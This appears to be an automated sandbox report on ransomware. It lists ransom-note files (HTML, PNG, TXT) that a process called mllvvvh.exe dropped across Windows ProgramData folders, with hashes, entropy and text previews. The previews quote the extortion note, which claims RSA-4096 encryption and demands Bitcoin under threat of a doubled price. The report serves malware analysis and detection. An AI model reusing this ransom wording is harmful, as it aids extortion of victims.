                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Device Stage\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Device Stage\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Device Stage\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\DeviceSync\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\DeviceSync\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\DeviceSync\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\AsimovUploader\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\AsimovUploader\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\AsimovUploader\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
